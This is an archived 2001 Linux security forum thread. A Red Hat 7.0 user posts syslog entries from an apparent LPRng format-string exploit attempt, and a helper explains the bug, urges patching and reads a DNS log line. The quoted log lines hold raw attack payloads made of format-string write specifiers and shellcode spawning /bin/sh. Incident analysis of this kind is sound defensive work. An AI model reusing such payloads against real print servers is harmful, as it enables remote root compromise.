LinuxQuestions.org
Go Job Hunting at the LQ Job Marketplace
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 05-01-2001, 07:05 AM   #1
Advocate
LQ Newbie
 
Registered: May 2001
Posts: 2

Rep: Reputation: 0
Unhappy


RH7.0
This I read most likely comprimised my root.
What other logs can I look in to try and get an idea of what this person did at 3:30 am last nite?
This was out of my /var/log/messages :
******************************************************
Apr 30 03:31:08 linux SERVER[6812]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
52u%300$n%.25u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:08 linux SERVER[6813]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
48u%300$n%.29u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:08 linux SERVER[6814]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
44u%300$n%.33u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:08 linux SERVER[6815]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
40u%300$n%.37u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:09 linux SERVER[6816]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
36u%300$n%.41u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:09 linux SERVER[6817]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
32u%300$n%.45u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:09 linux SERVER[6818]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
28u%300$n%.49u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:10 linux SERVER[6819]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
24u%300$n%.53u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:10 linux SERVER[6820]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.1
20u%300$n%.57u%301$nsecurity%302$n%.192u%303$n111F
1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
****************************************************

How can I stop this? Fawwwwwwwk!
 
Old 05-02-2001, 06:53 AM   #2
raz
Member
 
Registered: Apr 2001
Location: London
Posts: 408

Rep: Reputation: 31
Exclamation

Advovate,

Someone has "attempted" to get into your system through LPR's logging function.

Doesn't look like they got root access but they did use the LPRng string format _syslog bug, that could allow root access.

So far to my knowledge no one has managed to get root through this bug.

I have one suggestion just in case
GO PATCH IT NOW....

Then all those nasty messages will go away.

i386:
ftp://updates.redhat.com/7.0/en/os/i....24-2.i386.rpm

sources:
ftp://updates.redhat.com/7.0/en/os/S...6.24-2.src.rpm

Check out the command "last" and work out who was logged on at that time.

Bye,
/Raz



 
Old 05-03-2001, 06:36 AM   #3
Advocate
LQ Newbie
 
Registered: May 2001
Posts: 2

Original Poster
Rep: Reputation: 0
Talking Thanks RazBot

I appreciate you taking the time to view the post.

And not having root comprimised was such a relief to see you say!

I have already upgraded to RH7.1 (Seawolf). The one message I didnt post from my log file is as follows:
(this entry was made 30 seconds before the LPRng exploit started happening, would you consider this a likely candidate for the source?)

Apr 30 03:30:03 linux named[853]: Lame server on '221.239.219.216.in-addr.arpa' (in'239.219.216.in-addr.arpa'?): [216.219.254.10].53 'NS2.VALUEWEB.NET'

Again thanks for your time!
 
Old 05-04-2001, 02:31 AM   #4
raz
Member
 
Registered: Apr 2001
Location: London
Posts: 408

Rep: Reputation: 31
Advocate,

I that log message was not the person entering your system, but it is a message resulting in something they may have done with DIG or NSLOOKUP.

I guess they have been on the system before that time you got in the first LPRng bug logs.

------------
Apr 30 03:30:03 linux named[853]: Lame server on '221.239.219.216.in-addr.arpa' (in'239.219.216.in-addr.arpa'?): [216.219.254.10].53 'NS2.VALUEWEB.NET'
------------

The DNS records say that 216.219.239.221 should be a server for the 216.219.239.0 zone, but when in'239.219.216.in-addr. was asked for a record in the 216.219.239.0 it said that it wasn't authorities for that zone.
i.e a zone transfer attempt failed.

Looks like they knew what they were doing.

/Raz


 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
opera: client-error-bad-request landroni Linux - Software 0 11-22-2005 10:22 AM
svc bad request dropping packet naveenrajn Linux - Networking 0 07-04-2005 04:22 AM
client-error-bad-request when trying to print with lp blas Linux - General 4 02-09-2005 10:30 AM
network programming -- bad request mehesque Programming 2 09-21-2004 01:28 PM
Bad Request when web page loading wmartino Linux - Networking 2 09-14-2003 09:25 AM


All times are GMT -5. The time now is 11:59 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration